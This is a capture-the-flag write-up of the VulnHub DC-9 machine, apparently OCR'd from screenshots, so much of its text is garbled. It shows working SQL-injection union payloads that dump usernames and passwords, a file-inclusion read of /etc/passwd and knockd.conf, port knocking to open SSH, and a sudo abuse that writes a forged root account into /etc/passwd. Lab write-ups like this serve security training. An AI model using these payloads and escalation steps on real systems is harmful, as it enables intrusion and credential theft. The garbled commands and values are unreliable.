vulnhub

View on GitHub

DC-9

10 May 2022 09:21 PM

f- C G) O a 192.168.43.231/index.php Google Hacking DB Vigenere Solver - MN... LxdPrivilege Escalatio... Example.com - Staff Details Home Display All Records Search Manage Welcome to the Example.com Staff Details Page Please select an option trom the menu.

Search information You can search using either the first or last name. Search:

Search results Name: Mary Moe Position: CEO Phone No: 46478415155456 Email: marym@example.com Name: Julie Dooley Position: Human Resources Phone No: 46457131654 Email: julied@example.com Name: Fred Flintstone position: Systems Administrator Phone No: 46415323 Email: fredf@example.com Name: Barney Rubble

mary’ order by 1 – -

Home Display All Records Search Manage Search information You can search using either the first or last name. mar-y' order byl

Search results Name: Mary Moe Position: CEO Phone No: 46478415155456 Email: marym@example.com Go Back

mary’ union all select 1,2,3,4,5,6 – - mary’ union all select 1,2,3,4,@@version,6 – -

Search information You can search using either the first or last name. Search: elect -

Search results Name: Mary Moe Positiom CEO Phone No: 46478415155456 Email: marym@example.com Name: 2 3 Position: 4 Phone No: 10.3.17.ManaDB.0+deb10u1

mary’ union all select 1,2,3,4,schema_name,6 from information_schema.schemata – -

Search information can search using either the first or last name. mation_schema.schemata

Search results Name: Mary Moe position: CEO Phone No: 46478415155456 Email: marym@example.com Name: 2 3 Position: 4 Phone No: information schema Email: 6 Name: 23 Position: 4 Phone No: Staff Email: 6 Name: 2 3 Position: 4 Phone No: users Email: 6

mary’ union select all 1,2,3,4,table_name,6 from information_schema.tables – -

Search information You can search using either the first or last name. Search: 'formation schema-tables -

Phone No: INNOD8 SYS VIRTUAL Name: 2 3 Position: 4 Phone No: INNOD8 TABLESPACES SCRUBBING Email. 6 Name: 2 3 Position: 4 Phone No: INNODB SYS SEMAPHORE WAITS Email: 6 Name: 23 Position: 4 Phone No: StaffDetails Email: 6 Name: 2 3 Position: 4 Phone No: Users Email: 6 Name: 2 3 Positiom 4 Phone Use'DH:ml: Email: 6

mary’ union all select 1,2,3,4,column_name,6 FROM information_schema.columns where table_name=’UserDetails’ – -

Search results Name: 2 3 Position: 4 Phone No: id Email: 6 ID: 1 Name: 2 3 Position: 4 Phone No: firstname Email: 6 Name: 2 3 Position: 4 Phone No: lastname Email: 6 Name: 2 3 Position: 4 Phone No: username E-mail: 6 Name: 2 3 Position: 4 Phone No: password Email: 6 Name: 2 3 Position: 4 Phone No: reg_date Email: 6

mary’ union all select 1,2,3,concat(username),concat(password),6 FROM users.UserDetails – -

Search results Name: Mary Moe position: CEO Phone No: 46478415155456 Email: marym@example.com Name: 23 Position: marym Phone No: 3kfs86sfd Email: 6 Name: 2 3 Position: julied Phone No: 468stdfsd2 Email: 6 Name: 2 3 Position: tredt Phone No: 4std87std1 Email: 6 Name: 2 3 Position: barneyr Phone No: RocksOff Email: 6 ID: 1 Name: 23 Position: tomc Phone No: TC&TheBoyz Email: 6

mary’ union all select 1,2,3,concat(username),concat(password),6 FROM Users – -

Search results Name: Mary Moe Position: CEO Phone No: 46478415155456 Email: marym@example.com Name: 2 3 Position: admin Phone No: 8S6f5desgoef37314e7C3bdf6f8a66dC Email: 6

pass –>> 856f5de590ef37314e7c3bdf6f8a66dc

Enter up to 20 non-salted hashes. one per line: 856f5de590ef37314e7c3bdf6f8a66dc rm not a robot Crack Hashes LV md4. , sM2S6, 7.384. sMS12. 4.1* COW Putial

Example.com - Staff Details Home Display All Records Search Manage Login to manage records. admin Password:

Example.com - Staff Details Home Display All Records Search Manage Add Record Log Out Logged in as admin

r - ww... Lxd Privilege Escalatio... GTFOBins u Basic Linux Privilege E.. Example.com - Staff Details e online - ReverseSheu Beyond SQL: Obfusca... GitHub - bonsaiviking/... [Write- Home Display All Records Search Manage Add Record Log Out You are already logged in as admin. File does not exist bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:ldev: lusr/sbin/nologin Imam./usrjsbinjnologin Inews:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System lusrjsbinjnologin Time systemd- Network messagebus:x:104:110::lnonexistent:/usr/sbin/nologin lusr/sbin/nologin Core Dumper:/:/usr/sbin/nologin mysql:x:106:113:MySQL marym:x:1001:1001:Mary Moe/home/marym:/bin/bash Dooley.fhomeoulied: IbinJbash wilmat:x:1007:1007:Wilma Rubble:/home/bettyr:/bin/bash chandlerb:x:1009:1009:Chandler rachelg:x:1011:1011:Rachel monicag:x:1013:1013:Monica Geller:/home/monicag:/bin/bash phoebeb:x:1014:1014:Phoebe (bin!hash

Solver - ww Lid Privilege Escalatio... GTFOBins Basic Linux Privilege Online -Reverse Shell Beyond SQLi: Obfusca... Example.com - Staff Details Home Display All Records Search Manage Add Record Log Out You are already logged in as admin. File does not exist GitHub - bonsaiviking/... [options] usesyslog [opensSH] sequence = 7469.8475.9842 seq_timeout = 25 command = 1Sbinnptables -l INPUT -s -p tcp •ort 22 -j ACCEPT tcpflags syn [closeSSHl sequence = seq_timeout 25 command = Isbinhptables -D INPUT -s -p tcp „dport 22 -j ACCEPT tcpfiags = syn

Basically all the users that I saw earlier have access to the machine and the passwords we got might allow me to get into the machine, but from the nmap report we know that the SSH port is being filtered, this could mean that is either being restricted by IP maybe or we are dealing with “port knocking”. Taking advantage of the LFI I attempted to read a knockd.conf file if available and was able to successfully get information from such a file.

Great, now all we have to do is to knock the sequence of ports displayed from the file using nmap. Port knocking with nmap using those port numbers can be accomplished with the following command:

port knocking https://sushant747.gitbooks.io/total-oscp-guide/content/port_knocking.html

janitoracic-9:-$ Is -la total 16 d rwx drwxr-xr-x I rwxrwxrwx drwx drwx 4 19 1 3 2 cat: . secrets total 12 janitor janitor root root janitor janitor janitor janitor janitor janitor 4096 4096 9 4096 4096 Jun Dec Dec Jun Dec 13 29 29 13 29 cat secrets-for-putin/ -for-putin/: Is a directory cd . secrets-for-putin/ secrets-for-putin$ Is -la janitor janitor 4096 Dec 29 02:05 . 2019 . . bash _ history /dev/null 2019 02 : 09 . gnupg secrets-for-putin 2019 . 2019 . drwx drwx -rwx 2 1 janitor janitor 4096 Jun 13 02:05 janitor janitor 66 Dec 29 2019 passwords-found-on-post-it- secrets-for-putin$ cat passwords-found-on-post-it-notes. tx BamBamø1 Passwørd smellycats POLictnø-4 B4-Tru3-ØØ1 4uGU5T-NiGHts

fredfödc-9:-$ sudo -l Matching Defaults entries for fredf on dc-9: env_reset, mail_badpass, secure_path=/usr/local/sbin\: User fredf may run the following commands on dc-9: (root) NOPASSWD: /opt/devstuff/dist/test/test sudo /opt/devstuff/dist/test/test Usage: python test. py read append

sudo /opt/devstuff/dist/test/test /etc/shadow /tmp/pass cat /tmp/pass root : $6$1 Fbb8QQt c Fwj1PZraeiOCkMqsJ4/4pnd10aio. f2føLsmy2G91 EyxJrEZvZYjmXRf JK/ : 18259 : : 99999 : 7 : : : bin games backu

kali S kali ) - C—/Desktop/ctf/vu1nhub/dc9] opens-sl passwd pass BdLRyØXAnuuCE

nano /tmp/usr fredfidc-9 sudo /opt/devstuff/dist/test/test /tmp/usr /etc/passwd su newroot Password : id gid=ø(root) groups=ø(root) rootOdc-9:/home/fredfg whoami root cat /tmp/usr • 8dLRyØXAnuuCE : 0: : new_root : /root : /bin/bash newroot . 1

cat theflag.txt NICE WORK!! Congratulations - you have done well to get to this point. Hope you enjoyed DC-9. Just wanted to send out a big thanks to all those who have taken the time to complete the various DC challenges. I also want to send out a big thank you to the various members of . They are an inspirational bunch of fellows. Sure, they might smell a bit, but ... just kidding. Sadly, all things must come to an end, and this will be the last ever challenge in the DC series. So long, and thanks for all the fish.